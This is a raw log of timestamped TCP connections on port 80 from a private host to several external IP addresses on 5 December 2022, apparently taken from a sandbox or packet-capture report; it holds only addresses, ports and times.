                                                                                                                                                                          Dec 5, 2022 15:16:03.968425989 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.968628883 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.968667984 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.968863964 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.968902111 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.968930006 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.969153881 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.969333887 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.969373941 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.969422102 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.984997988 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.985038996 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.985100031 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.985177994 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.985274076 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:04.937542915 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:05.953568935 CET4986080192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:05.964946032 CET804986075.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:05.965275049 CET4986080192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:05.965394974 CET4986080192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:05.976453066 CET804986075.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:06.114550114 CET804986075.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:06.114631891 CET804986075.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:06.115052938 CET4986080192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:06.115052938 CET4986080192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:06.126465082 CET804986075.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:11.183585882 CET4986180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:11.207596064 CET80498612.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:11.207927942 CET4986180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:11.208053112 CET4986180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:11.231837988 CET80498612.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:11.231944084 CET80498612.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:11.232059956 CET80498612.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:11.232218981 CET4986180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:12.217355013 CET4986180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:13.244002104 CET4986280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:13.268157005 CET80498622.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:13.268371105 CET4986280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:13.268534899 CET4986280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:13.292597055 CET80498622.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:13.292660952 CET80498622.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:13.292707920 CET80498622.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:13.292926073 CET4986280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:14.279331923 CET4986280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.294985056 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.323209047 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.323472023 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.324063063 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.324172974 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.352072001 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.352143049 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.352186918 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.352364063 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.352364063 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.352371931 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.352453947 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.352564096 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.352667093 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.352672100 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.352761030 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.352938890 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.380636930 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.380701065 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.380743027 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.380867004 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.380914927 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.380928040 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.381007910 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:15.381217003 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.381267071 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.381448030 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.381490946 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.408934116 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.408997059 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.409322023 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.409382105 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.409652948 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.409715891 CET80498632.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:15.409929037 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:16.325788021 CET4986380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:17.341423988 CET4986480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:17.369319916 CET80498642.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:17.369679928 CET4986480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:17.369810104 CET4986480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:17.397340059 CET80498642.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:17.397447109 CET80498642.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:17.397469997 CET80498642.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:17.397780895 CET4986480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:17.397916079 CET4986480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:16:17.425549030 CET80498642.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:22.742458105 CET4986680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:22.993910074 CET8049866103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:22.994231939 CET4986680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:22.994231939 CET4986680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:23.246049881 CET8049866103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:23.246773958 CET8049866103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:23.246845007 CET8049866103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:23.247100115 CET4986680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:23.256289959 CET8049866103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:23.256700993 CET4986680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:23.456300974 CET8049866103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:23.456592083 CET4986680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:23.995980024 CET4986680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:25.011837959 CET4986880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:25.263025999 CET8049868103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:25.263252020 CET4986880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:25.263375044 CET4986880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:25.514355898 CET8049868103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:25.515036106 CET8049868103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:25.515109062 CET8049868103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:25.515402079 CET4986880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:26.276765108 CET4986880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.292406082 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.543454885 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.543761015 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.544348955 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.544384956 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.544465065 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.795305967 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.795345068 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.795365095 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.795381069 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.795490980 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.795506954 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.795523882 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.795701981 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.795753002 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:27.796114922 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:27.838788986 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:28.047054052 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047156096 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047198057 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047235966 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047276020 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047314882 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047353029 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047389984 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047391891 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:28.047430038 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.047499895 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:28.299357891 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299432993 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299484015 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299536943 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299582958 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299629927 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299676895 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299722910 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299768925 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299815893 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.299865961 CET8049869103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:28.300051928 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:28.557389975 CET4986980192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:29.573102951 CET4987080192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:29.824426889 CET8049870103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:29.824682951 CET4987080192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:29.824801922 CET4987080192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:30.075999022 CET8049870103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:30.076570034 CET8049870103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:30.076657057 CET8049870103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:30.077080011 CET4987080192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:30.077198982 CET4987080192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:16:30.331100941 CET8049870103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:43.167984962 CET4987180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:43.326479912 CET804987166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:43.326796055 CET4987180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:43.326953888 CET4987180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:43.485424995 CET804987166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:43.668857098 CET804987166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:43.668876886 CET804987166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:43.669176102 CET4987180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:44.335340023 CET4987180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:45.350877047 CET4987280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:45.511250019 CET804987266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:45.511512995 CET4987280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:45.511632919 CET4987280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:45.672288895 CET804987266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:45.811323881 CET804987266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:45.811408997 CET804987266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:45.811716080 CET4987280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:46.522255898 CET4987280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.537920952 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.696542978 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.696813107 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.697463036 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.697559118 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.856257915 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.856347084 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.856399059 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.856440067 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.856573105 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.856667042 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.856703043 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.856791973 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.856796980 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.856874943 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:47.856955051 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:47.857224941 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:48.015425920 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.015489101 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.015532017 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.015573025 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.015747070 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:48.015846014 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:48.016590118 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.016829014 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:48.017087936 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.017177105 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.017510891 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.017862082 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.017918110 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.018193960 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.174515963 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.175290108 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.175358057 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.175484896 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.341778040 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.341826916 CET804987366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:48.341954947 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:48.709213018 CET4987380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:49.726102114 CET4987480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:49.885067940 CET804987466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:49.885665894 CET4987480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:49.885667086 CET4987480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:50.044425964 CET804987466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:50.208544016 CET804987466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:50.208561897 CET804987466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:50.208951950 CET4987480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:50.209023952 CET4987480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:16:50.367232084 CET804987466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.385557890 CET4987680192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:55.403511047 CET8049876194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.403753042 CET4987680192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:55.403830051 CET4987680192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:55.421488047 CET8049876194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.422645092 CET8049876194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.422729969 CET8049876194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.422780037 CET8049876194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.422826052 CET8049876194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.422966003 CET4987680192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:55.423038960 CET4987680192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:56.410583973 CET4987680192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:57.426314116 CET4987780192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:57.444188118 CET8049877194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:57.444432020 CET4987780192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:57.444516897 CET4987780192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:57.462275028 CET8049877194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:57.463150024 CET8049877194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:57.463247061 CET8049877194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:57.463304043 CET8049877194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:57.463356018 CET8049877194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:57.463430882 CET4987780192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:57.463510036 CET4987780192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:58.457164049 CET4987780192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.472595930 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.490351915 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.490587950 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.491189957 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.491230011 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.491296053 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.508877993 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.508913994 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.509062052 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.509094000 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.509145975 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.509263039 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.509335995 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.509502888 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.509654045 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.526793003 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.526868105 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.527017117 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.527086020 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.527112961 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.527133942 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.527184963 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.527295113 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.527350903 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.527498007 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.544675112 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.544826031 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.544884920 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.545141935 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.545306921 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.545398951 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.545420885 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.545562983 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.545628071 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:16:59.545785904 CET8049878194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:59.545972109 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:00.503442049 CET4987880192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:01.519416094 CET4987980192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:01.537316084 CET8049879194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:01.537631035 CET4987980192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:01.537708044 CET4987980192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:01.555284977 CET8049879194.245.148.189192.168.11.20
